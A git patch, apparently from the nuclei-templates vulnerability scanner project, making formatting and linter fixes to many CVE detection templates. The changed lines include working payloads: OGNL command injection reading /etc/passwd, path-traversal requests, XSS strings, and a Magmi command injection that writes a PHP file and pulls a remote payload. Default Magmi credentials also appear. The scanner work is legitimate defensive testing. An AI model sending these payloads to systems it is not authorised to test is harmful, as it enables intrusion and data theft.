changed diff --git a/cves/2017/CVE-2017-7391.yaml b/cves/2017/CVE-2017-7391.yaml index fab72d8d74..a3ebfb4f8d 100644 --- a/cves/2017/CVE-2017-7391.yaml +++ b/cves/2017/CVE-2017-7391.yaml @@ -6,8 +6,9 @@ info: severity: medium description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL. tags: cve,cve2017,magmi,xss - reference: https://github.com/dweeves/magmi-git/issues/522 - # Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip + reference: + - https://github.com/dweeves/magmi-git/issues/522 + - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip requests: - method: GET diff --git a/cves/2020/CVE-2020-11991.yaml b/cves/2020/CVE-2020-11991.yaml index 18f07c95ee..043b9aeaa0 100644 --- a/cves/2020/CVE-2020-11991.yaml +++ b/cves/2020/CVE-2020-11991.yaml @@ -14,7 +14,7 @@ requests: path: - "{{BaseURL}}/v2/api/product/manger/getInfo" headers: - Content-type: "text/xml" + Content-Type: "text/xml" body: | ]> diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml index 9688a0fa4b..21cf8027b4 100644 --- a/cves/2020/CVE-2020-25223.yaml +++ b/cves/2020/CVE-2020-25223.yaml @@ -19,7 +19,7 @@ requests: Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.5.1.1 - Content-type: application/json; charset=UTF-8 + Content-Type: application/json; charset=UTF-8 Origin: {{BaseURL}} Connection: close Referer: {{BaseURL}} diff --git a/cves/2020/CVE-2020-5776.yaml b/cves/2020/CVE-2020-5776.yaml index af8c29283c..513a3be8c5 100644 --- a/cves/2020/CVE-2020-5776.yaml +++ b/cves/2020/CVE-2020-5776.yaml @@ -17,14 +17,14 @@ requests: - | POST /magmi/web/magmi_saveprofile.php HTTP/1.1 Host: {{Hostname}} - Content-type: application/x-www-form-urlencoded + Content-Type: application/x-www-form-urlencoded Connection: close profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses= - | POST /magmi/web/magmi_run.php HTTP/1.1 Host: {{Hostname}} - Content-type: application/x-www-form-urlencoded + Content-Type: application/x-www-form-urlencoded Connection: close engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update diff --git a/cves/2020/CVE-2020-5777.yaml b/cves/2020/CVE-2020-5777.yaml index 830da22728..6dbfb02778 100644 --- a/cves/2020/CVE-2020-5777.yaml +++ b/cves/2020/CVE-2020-5777.yaml @@ -10,7 +10,7 @@ info: # Response code 503 indicates a potential successful "Too many connections" error # While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php - # whith default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=) + # with default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=) # Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100 requests: diff --git a/default-logins/grafana/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml index 7f783dfd10..377385c534 100644 --- a/default-logins/grafana/grafana-default-credential.yaml +++ b/default-logins/grafana/grafana-default-credential.yaml @@ -23,8 +23,7 @@ requests: - prom-operator - admin - # Added default grafana and prometheus user. - # Source: https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page + # Added default grafana and prometheus user. reference[2] attack: sniper diff --git a/technologies/magento-detect.yaml b/technologies/magento-detect.yaml index ee57eac989..de461a9837 100644 --- a/technologies/magento-detect.yaml +++ b/technologies/magento-detect.yaml @@ -5,6 +5,8 @@ info: author: TechbrunchFR severity: info description: Identify Magento + reference: + - https://devdocs.magento.com/guides/v2.4/graphql/ tags: magento requests: @@ -14,8 +16,7 @@ requests: - '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}' # There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when - # consumed by a SPA/PWA app so we need a valid GraphQL query from Magento to check - # https://devdocs.magento.com/guides/v2.4/graphql/ + # consumed by a SPA/PWA app, so we need a valid GraphQL query from Magento to check reference[1] matchers-condition: or matchers: From 77103bc629fd0e64888d27a85ded6676821d4458 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Thu, 19 Aug 2021 17:44:46 +0300 Subject: [PATCH 1749/4083] Satisfying the linter (all errors and warnings) * whitespace modifications only --- cnvd/CNVD-2021-30167.yaml | 4 +- cves/2007/CVE-2007-4556.yaml | 2 +- cves/2012/CVE-2012-1835.yaml | 8 +- cves/2013/CVE-2013-1965.yaml | 2 +- cves/2013/CVE-2013-3827.yaml | 4 +- cves/2013/CVE-2013-7240.yaml | 4 +- cves/2014/CVE-2014-4210.yaml | 4 +- cves/2015/CVE-2015-2080.yaml | 2 +- cves/2015/CVE-2015-3337.yaml | 36 +++--- cves/2015/CVE-2015-5688.yaml | 40 +++--- cves/2015/CVE-2015-7823.yaml | 4 +- cves/2016/CVE-2016-2004.yaml | 4 +- cves/2017/CVE-2017-1000028.yaml | 36 +++--- cves/2017/CVE-2017-1000486.yaml | 8 +- cves/2017/CVE-2017-10271.yaml | 90 +++++++------- cves/2017/CVE-2017-12149.yaml | 6 +- cves/2017/CVE-2017-12542.yaml | 4 +- cves/2017/CVE-2017-12615.yaml | 38 +++--- cves/2017/CVE-2017-12629.yaml | 8 +- cves/2017/CVE-2017-12637.yaml | 6 +- cves/2017/CVE-2017-14535.yaml | 4 +- cves/2017/CVE-2017-14537.yaml | 6 +- cves/2017/CVE-2017-15944.yaml | 4 +- cves/2017/CVE-2017-3506.yaml | 4 +- cves/2017/CVE-2017-3528.yaml | 4 +- cves/2017/CVE-2017-5487.yaml | 4 +- cves/2017/CVE-2017-5638.yaml | 18 +-- cves/2017/CVE-2017-9805.yaml | 114 +++++++++--------- cves/2018/CVE-2018-16059.yaml | 4 +- cves/2018/CVE-2018-16283.yaml | 4 +- cves/2018/CVE-2018-17431.yaml | 4 +- cves/2018/CVE-2018-8715.yaml | 2 +- cves/2019/CVE-2019-0193.yaml | 6 +- cves/2019/CVE-2019-0221.yaml | 8 +- cves/2019/CVE-2019-1010287.yaml | 2 +- cves/2019/CVE-2019-12616.yaml | 8 +- cves/2019/CVE-2019-13101.yaml | 6 +- cves/2019/CVE-2019-15043.yaml | 2 +- cves/2019/CVE-2019-15107.yaml | 2 +- cves/2019/CVE-2019-16097.yaml | 6 +- cves/2019/CVE-2019-17506.yaml | 2 +- cves/2019/CVE-2019-2616.yaml | 4 +- cves/2019/CVE-2019-2767.yaml | 4 +- cves/2019/CVE-2019-3396.yaml | 18 +-- cves/2019/CVE-2019-7238.yaml | 4 +- cves/2019/CVE-2019-7256.yaml | 2 +- cves/2019/CVE-2019-9733.yaml | 30 ++--- cves/2020/CVE-2019-9618.yaml | 4 +- cves/2020/CVE-2020-11034.yaml | 6 +- cves/2020/CVE-2020-11978.yaml | 6 +- cves/2020/CVE-2020-13167.yaml | 16 +-- cves/2020/CVE-2020-13700.yaml | 6 +- cves/2020/CVE-2020-13937.yaml | 12 +- cves/2020/CVE-2020-14883.yaml | 2 +- cves/2020/CVE-2020-15148.yaml | 4 +- cves/2020/CVE-2020-15227.yaml | 8 +- cves/2020/CVE-2020-21224.yaml | 2 +- cves/2020/CVE-2020-27866.yaml | 6 +- cves/2020/CVE-2020-27986.yaml | 6 +- cves/2020/CVE-2020-36112.yaml | 4 +- cves/2020/CVE-2020-36289.yaml | 4 +- cves/2020/CVE-2020-5307.yaml | 2 +- cves/2020/CVE-2020-7209.yaml | 4 +- cves/2020/CVE-2020-7961.yaml | 4 +- cves/2020/CVE-2020-9490.yaml | 8 +- cves/2021/CVE-2021-20090.yaml | 6 +- cves/2021/CVE-2021-20091.yaml | 6 +- cves/2021/CVE-2021-20092.yaml | 6 +- cves/2021/CVE-2021-21307.yaml | 6 +- cves/2021/CVE-2021-22214.yaml | 6 +- cves/2021/CVE-2021-24176.yaml | 4 +- cves/2021/CVE-2021-24237.yaml | 4 +- cves/2021/CVE-2021-24285.yaml | 6 +- cves/2021/CVE-2021-24316.yaml | 4 +- cves/2021/CVE-2021-24495.yaml | 4 +- cves/2021/CVE-2021-25646.yaml | 4 +- cves/2021/CVE-2021-26295.yaml | 6 +- cves/2021/CVE-2021-26812.yaml | 4 +- cves/2021/CVE-2021-26855.yaml | 10 +- cves/2021/CVE-2021-27651.yaml | 4 +- cves/2021/CVE-2021-27850.yaml | 2 +- cves/2021/CVE-2021-27905.yaml | 8 +- cves/2021/CVE-2021-28073.yaml | 4 +- cves/2021/CVE-2021-28149.yaml | 2 +- cves/2021/CVE-2021-29203.yaml | 4 +- cves/2021/CVE-2021-29484.yaml | 4 +- cves/2021/CVE-2021-3129.yaml | 4 +- cves/2021/CVE-2021-32820.yaml | 4 +- cves/2021/CVE-2021-3377.yaml | 4 +- cves/2021/CVE-2021-34473.yaml | 6 +- cves/2021/CVE-2021-35336.yaml | 4 +- cves/2021/CVE-2021-35464.yaml | 2 +- .../alibaba-canal-default-password.yaml | 2 +- default-logins/gitlab/gitlab-weak-login.yaml | 2 +- .../grafana/grafana-default-credential.yaml | 6 +- dns/azure-takeover-detection.yaml | 6 +- dns/detect-dangling-cname.yaml | 8 +- exposures/apis/wadl-api.yaml | 4 +- exposures/configs/exposed-gitignore.yaml | 4 +- .../configs/exposed-sharepoint-list.yaml | 4 +- exposures/configs/qdpm-info-leak.yaml | 2 +- fuzzing/iis-shortname.yaml | 4 +- headless/postmessage-tracker.yaml | 44 +++---- miscellaneous/tabnabbing-check.yaml | 6 +- miscellaneous/unpatched-coldfusion.yaml | 4 +- misconfiguration/akamai-arl-xss.yaml | 10 +- misconfiguration/exposed-service-now.yaml | 4 +- .../gitlab/gitlab-public-repos.yaml | 4 +- .../gitlab/gitlab-public-snippets.yaml | 4 +- .../gitlab/gitlab-user-enumeration.yaml | 6 +- .../sap/sap-netweaver-info-leak.yaml | 4 +- .../zabbix-dashboards-access.yaml | 4 +- network/deprecated-sshv1-detection.yaml | 4 +- network/openssh5.3-detect.yaml | 6 +- takeovers/ceros-takeover.yaml | 4 +- technologies/detect-sentry.yaml | 4 +- .../microsoft-exchange-server-detect.yaml | 2 +- technologies/waf-detect.yaml | 8 +- .../apache/apache-flink-unauth-rce.yaml | 6 +- .../apache/apache-solr-file-read.yaml | 6 +- vulnerabilities/generic/cache-poisoning.yaml | 4 +- .../lsoft/listserv_maestro_rce.yaml | 4 +- vulnerabilities/oracle/oracle-ebs-xss.yaml | 6 +- .../other/buffalo-config-injection.yaml | 6 +- vulnerabilities/other/concrete-xss.yaml | 6 +- .../other/dlink-850L-info-leak.yaml | 2 +- .../other/maian-cart-preauth-rce.yaml | 6 +- .../ms-exchange-server-reflected-xss.yaml | 4 +- .../nginx-merge-slashes-path-traversal.yaml | 4 +- vulnerabilities/other/opensns-rce.yaml | 4 +- vulnerabilities/other/rconfig-rce.yaml | 4 +- .../other/sonicwall-sslvpn-shellshock.yaml | 4 +- .../other/wooyun-path-traversal.yaml | 6 +- vulnerabilities/other/yapi-rce.yaml | 8 +- .../wordpress/wordpress-woocommerce-sqli.yaml | 4 +- .../wordpress-wpcourses-info-disclosure.yaml | 4 +- .../wp-123contactform-plugin-listing.yaml | 4 +- .../wp-memphis-documents-library-lfi.yaml | 4 +- .../wordpress/wp-slideshow-xss.yaml | 6 +- .../wp-woocommerce-pdf-invoice-listing.yaml | 6 +- 140 files changed, 543 insertions(+), 543 deletions(-) diff --git a/cnvd/CNVD-2021-30167.yaml b/cnvd/CNVD-2021-30167.yaml index 7b7bc68cd0..c6a28b6fb0 100644 --- a/cnvd/CNVD-2021-30167.yaml +++ b/cnvd/CNVD-2021-30167.yaml @@ -5,8 +5,8 @@ info: author: pikpikcu severity: high reference: - - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A - - https://www.cnvd.org.cn/webinfo/show/6491 + - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A + - https://www.cnvd.org.cn/webinfo/show/6491 tags: beanshell,rce,cnvd requests: diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml index 61b24bab2c..1a7b1450ed 100644 --- a/cves/2007/CVE-2007-4556.yaml +++ b/cves/2007/CVE-2007-4556.yaml @@ -15,7 +15,7 @@ requests: headers: Content-Type: application/x-www-form-urlencoded body: | - username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D matchers-condition: and matchers: diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index 9bc5c08991..a176328129 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml @@ -12,10 +12,10 @@ requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml index 5539dfc559..e2e5f0a70c 100644 --- a/cves/2013/CVE-2013-1965.yaml +++ b/cves/2013/CVE-2013-1965.yaml @@ -15,7 +15,7 @@ requests: headers: Content-Type: application/x-www-form-urlencoded body: | - name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D matchers-condition: and matchers: diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml index 033bea7806..2e0d3cb4a9 100644 --- a/cves/2013/CVE-2013-3827.yaml +++ b/cves/2013/CVE-2013-3827.yaml @@ -7,8 +7,8 @@ info: description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. tags: cve,cve2013,lfi,javafaces,oracle reference: - - https://nvd.nist.gov/vuln/detail/CVE-2013-3827 - - https://www.exploit-db.com/exploits/38802 + - https://nvd.nist.gov/vuln/detail/CVE-2013-3827 + - https://www.exploit-db.com/exploits/38802 requests: - method: GET diff --git a/cves/2013/CVE-2013-7240.yaml b/cves/2013/CVE-2013-7240.yaml index a91e2000b3..35cf6180ea 100644 --- a/cves/2013/CVE-2013-7240.yaml +++ b/cves/2013/CVE-2013-7240.yaml @@ -6,8 +6,8 @@ info: severity: high description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. reference: - - https://www.exploit-db.com/exploits/38936 - - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 + - https://www.exploit-db.com/exploits/38936 + - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 tags: cve,cve2013,wordpress,wp-plugin,lfi requests: diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml index 9a70384c82..cc9b0f8793 100644 --- a/cves/2014/CVE-2014-4210.yaml +++ b/cves/2014/CVE-2014-4210.yaml @@ -6,8 +6,8 @@ info: severity: medium tags: cve,cve2014,weblogic,oracle,ssrf reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html + - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 + - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html requests: - method: GET diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml index 52a97a3a65..f70ef7d40a 100644 --- a/cves/2015/CVE-2015-2080.yaml +++ b/cves/2015/CVE-2015-2080.yaml @@ -9,7 +9,7 @@ info: - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html description: | - The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak + The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak tags: cve,cve2015,jetty requests: diff --git a/cves/2015/CVE-2015-3337.yaml b/cves/2015/CVE-2015-3337.yaml index 8b3acdf235..57306fca9b 100644 --- a/cves/2015/CVE-2015-3337.yaml +++ b/cves/2015/CVE-2015-3337.yaml @@ -1,25 +1,25 @@ id: CVE-2015-3337 info: - name: Elasticsearch Head plugin LFI - author: pdteam - severity: high - description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors. - reference: https://www.exploit-db.com/exploits/37054/ - tags: cve,cve2015,elastic,lfi + name: Elasticsearch Head plugin LFI + author: pdteam + severity: high + description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors. + reference: https://www.exploit-db.com/exploits/37054/ + tags: cve,cve2015,elastic,lfi requests: - - method: GET - path: - - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd" + - method: GET + path: + - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - part: body + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + part: body - - type: status - status: - - 200 + - type: status + status: + - 200 diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml index 863d5b557d..aef5505ea8 100644 --- a/cves/2015/CVE-2015-5688.yaml +++ b/cves/2015/CVE-2015-5688.yaml @@ -1,27 +1,27 @@ id: CVE-2015-5688 info: - name: Geddy before v13.0.8 LFI - author: pikpikcu - severity: high - description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI. - reference: - - https://nodesecurity.io/advisories/geddy-directory-traversal - - https://github.com/geddy/geddy/issues/697 - tags: cve,cve2015,geddy,lfi + name: Geddy before v13.0.8 LFI + author: pikpikcu + severity: high + description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI. + reference: + - https://nodesecurity.io/advisories/geddy-directory-traversal + - https://github.com/geddy/geddy/issues/697 + tags: cve,cve2015,geddy,lfi requests: - - method: GET - path: - - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - method: GET + path: + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - part: body + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + part: body - - type: status - status: - - 200 + - type: status + status: + - 200 diff --git a/cves/2015/CVE-2015-7823.yaml b/cves/2015/CVE-2015-7823.yaml index 4fe2a7a788..6cb8fcbda7 100644 --- a/cves/2015/CVE-2015-7823.yaml +++ b/cves/2015/CVE-2015-7823.yaml @@ -5,8 +5,8 @@ info: author: 0x_Akoko description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability reference: - - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html - - https://nvd.nist.gov/vuln/detail/CVE-2015-7823 + - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html + - https://nvd.nist.gov/vuln/detail/CVE-2015-7823 severity: low tags: cve,cve2015,kentico,redirect diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml index 49679ca46d..639320dfc8 100644 --- a/cves/2016/CVE-2016-2004.yaml +++ b/cves/2016/CVE-2016-2004.yaml @@ -7,8 +7,8 @@ info: tags: cve,cve2016,network,iot,hp,rce description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. reference: - - https://www.exploit-db.com/exploits/39858 - - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 + - https://www.exploit-db.com/exploits/39858 + - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 network: - inputs: diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml index 272270c8a2..7dc6d15282 100644 --- a/cves/2017/CVE-2017-1000028.yaml +++ b/cves/2017/CVE-2017-1000028.yaml @@ -1,24 +1,24 @@ id: CVE-2017-1000028 info: - name: GlassFish LFI - author: pikpikcu - severity: high - description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. - reference: https://www.exploit-db.com/exploits/45196 - tags: cve,cve2017,oracle,glassfish,lfi + name: GlassFish LFI + author: pikpikcu + severity: high + description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. + reference: https://www.exploit-db.com/exploits/45196 + tags: cve,cve2017,oracle,glassfish,lfi requests: - - method: GET - path: - - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - matchers-condition: and - matchers: - - type: word - words: - - "/sbin/nologin" - part: body + - method: GET + path: + - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" + matchers-condition: and + matchers: + - type: word + words: + - "/sbin/nologin" + part: body - - type: status - status: - - 200 \ No newline at end of file + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml index 3f8ce3acd8..41d8c711b1 100644 --- a/cves/2017/CVE-2017-1000486.yaml +++ b/cves/2017/CVE-2017-1000486.yaml @@ -6,10 +6,10 @@ info: severity: critical description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution reference: - - https://github.com/mogwailabs/CVE-2017-1000486 - - https://github.com/pimps/CVE-2017-1000486 - - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html - - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 + - https://github.com/mogwailabs/CVE-2017-1000486 + - https://github.com/pimps/CVE-2017-1000486 + - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 tags: cve,cve2017,primetek,rce requests: diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index be45ec2616..2782404f8a 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -13,52 +13,52 @@ info: requests: - raw: - | - POST /wls-wsat/CoordinatorPortType HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close - Content-Type: text/xml - Content-Length: 5178 + POST /wls-wsat/CoordinatorPortType HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Connection: close + Content-Type: text/xml + Content-Length: 5178 - - - - - - - 